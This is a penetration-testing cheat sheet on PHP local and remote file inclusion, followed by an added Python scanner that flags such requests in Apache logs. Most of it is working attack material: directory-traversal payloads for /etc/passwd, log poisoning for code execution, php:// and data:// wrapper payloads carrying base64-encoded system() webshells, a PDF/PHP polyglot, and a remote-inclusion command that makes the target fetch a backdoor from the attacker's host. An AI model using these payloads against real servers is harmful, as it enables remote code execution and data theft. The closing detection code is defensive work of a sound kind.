File Inclusion
Local File Inclusion
http://<RHOST>/<FILE>.php?file=
http://<RHOST>/<FILE>.php?file=../../../../../../../../etc/passwd
http://<RHOST>/<FILE>.php?file=../../../../../../../../../../etc/passwd
Null Byte
%00
0x00
Encoded Traversal Strings
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\
Poisoning of Apache logs
kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log
...
192.168.50.1 - - [12/Apr/2022:10:34:55 +0000] "GET /meteor/index.php?page=admin.php HTTP/1.1" 200 2218 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
...
Modify the User-Agent header to contain PHP code, then include the log again to obtain RCE.

PHP Wrappers
Filter Wrapper
Using php://filter, we can also display the contents of executable files such as .php, rather than executing them.
The PHP wrapper uses resource as the required parameter to specify the file stream for filtering, which is the filename in our case.
http://test.com/meteor/index.php?page=php://filter/resource=admin.php
Let's now encode the output with base64 by adding convert.base64-encode. This converts the specified resource to a base64 string.
http://test.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php
We can now use the base64 program with the -d flag to decode the encoded data in the terminal.
echo "<BASE64_OUTPUT>" | base64 -d
Data Wrapper
We can use the data:// wrapper to achieve code execution. This wrapper is used to embed data elements as plaintext or base64-encoded data in the running web application's code.
curl "http://test.com/meteor/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>"
When web application firewalls or other security mechanisms are in place, they may filter strings like "system" or other PHP code elements. In such a scenario, we can try to use the data:// wrapper with base64-encoded data.
echo -n '<?php echo system($_GET["cmd"]);?>' | base64
curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls"
However, we need to be aware that the data:// wrapper will not work in a default PHP installation. To exploit it, the allow_url_include setting needs to be enabled.
data://text/plain;base64,[command encoded in base64]
or
data://text/plain,<?php shell_exec($_GET['cmd']);?>
File Wrapper
http://localhost/include.php?page=file:///path/to/file.ext
PDF PHP Inclusion
Create a file that starts with a PDF header and contains PHP code.
%PDF-1.4
<?php
system($_GET["cmd"]);
?>
http://<RHOST>/index.php?page=uploads/<FILE>.pdf%00&cmd=whoami
Remote File Inclusion (RFI)
While LFI vulnerabilities can be used to include local files, RFI vulnerabilities allow us to include files from a remote system over HTTP or SMB. The included file is also executed in the context of the web application.
Kali Linux includes several PHP webshells in the /usr/share/webshells/php/ directory that can be used for RFI. In this example, we will use the simple-backdoor.php webshell to exploit an RFI vulnerability.
### /usr/share/webshells/php/simple-backdoor.php
<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
Start a web server on our machine to serve the webshell
python3 -m http.server 80
curl "http://test.com/index.php?page=http://<ip>/simple-backdoor.php&cmd=ls"
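From the defender's side, as an added example that is not part of the original notes: a small Python scanner that flags the traversal encodings, null bytes, PHP wrappers, remote include URLs and injected PHP code from the sections above in Apache combined-format log lines. The sample log lines are constructed (modelled on the access.log excerpt above), and the indicator names and regexes are my own, not from any tool.

```python
import re
from urllib.parse import unquote

# Apache combined log: ip ident user [time] "METHOD path HTTP/x" status size "referer" "user-agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

# Coarse indicators, tune per application (e.g. a legitimate ?redirect=https:// parameter).
# Traversal is matched after decoding, plus the overlong UTF-8 and %u forms unquote() leaves intact.
INDICATORS = {
    "traversal": re.compile(r'\.\.[/\\]|%c0%ae|%uff0e|%u2215|%u2216'),
    "null_byte": re.compile(r'%00|\x00'),
    "php_wrapper": re.compile(r'php://|data:(//)?text|file://'),
    "remote_include": re.compile(r'=\s*https?://'),
    "php_code": re.compile(r'<\?php|\bsystem\s*\('),
}

def normalise(value: str) -> str:
    """URL-decode repeatedly (so %252e double encoding is resolved) and lower-case."""
    prev = None
    for _ in range(3):  # bounded: a pathological input cannot loop forever
        if value == prev:
            break
        prev, value = value, unquote(value)
    return value.lower()

def classify_request(path: str, user_agent: str = "") -> set:
    """Return the set of indicator names tripped by a request path (+ query) and User-Agent."""
    haystack = f"{path.lower()}\n{normalise(path)}\n{user_agent.lower()}"
    return {name for name, rx in INDICATORS.items() if rx.search(haystack)}

def scan_access_log(lines):
    """Return (client_ip, path, sorted labels) for each log line that trips at least one indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        ip, _method, path, _status, ua = m.groups()
        labels = classify_request(path, ua)
        if labels:
            hits.append((ip, path, sorted(labels)))
    return hits

# Constructed sample lines modelled on the access.log excerpt above (not real traffic).
SAMPLE_LOG = [
    '192.168.50.1 - - [12/Apr/2022:10:34:55 +0000] "GET /meteor/index.php?page=admin.php HTTP/1.1" 200 2218 "-" "Mozilla/5.0"',
    '192.168.50.7 - - [12/Apr/2022:10:35:01 +0000] "GET /meteor/index.php?page=%252e%252e%252f%252e%252e%252fetc/passwd HTTP/1.1" 200 1541 "-" "curl/7.81.0"',
    '192.168.50.7 - - [12/Apr/2022:10:35:09 +0000] "GET /meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php HTTP/1.1" 200 3012 "-" "curl/7.81.0"',
    '192.168.50.7 - - [12/Apr/2022:10:35:20 +0000] "GET /meteor/index.php?page=../../../../var/log/apache2/access.log HTTP/1.1" 200 9912 "-" "Mozilla/5.0 <?php system($_GET[\'cmd\']); ?>"',
    '192.168.50.7 - - [12/Apr/2022:10:35:31 +0000] "GET /index.php?page=http://192.168.50.7/simple-backdoor.php&cmd=ls HTTP/1.1" 200 412 "-" "curl/7.81.0"',
]
```

Run `scan_access_log(SAMPLE_LOG)` to get one hit per suspicious line; the first, benign request to admin.php produces none.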